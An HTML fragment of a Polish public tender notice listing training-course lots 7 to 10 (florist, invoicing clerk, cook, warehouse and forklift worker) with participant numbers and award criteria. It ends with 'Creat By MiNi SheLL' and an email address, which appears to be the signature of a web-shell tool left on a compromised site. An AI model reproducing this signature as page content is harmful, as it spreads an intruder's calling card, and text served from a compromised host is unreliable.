<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> SZKOLENIE O NAZWIE FLORYSTA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 1 (lipiec)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 15 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 15 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 13 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> SZKOLENIE O NAZWIE FAKTURZYSTA Z OBSŁUGĄ KASY FISKALNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 4 (lipiec, sierpień, wrzesień, listopad)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 40 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> SZKOLENIE O NAZWIE KUCHARZ MAŁEJ GASTRONOMII.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 1 (sierpień)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 15 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 15 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 13 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> SZKOLENIE O NAZWIE MAGAZYNIER Z OBSŁUGĄ WÓZKÓW PODNOŚNIKOWYCH I KOMPUTERA - FAKTUROWANIE KOMPUTEROWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Liczba kursów i uczestników szkolenia 
a)	Liczba kursów - 1 (październik)
b)	Liczba uczestników wszystkich kursów (całego zamówienia) - 10 uczestników.
c)	Maksymalna liczba uczestników jednego kursu wynosi - 10 uczestników. 
d)	Minimalna liczba uczestników jednego kursu wynosi - 8 uczestników..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Akredytacja w zakresie przedmiotu poszczególnej części zamówienia - 30</li>
<li>3. Certyfikat jakości usług - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com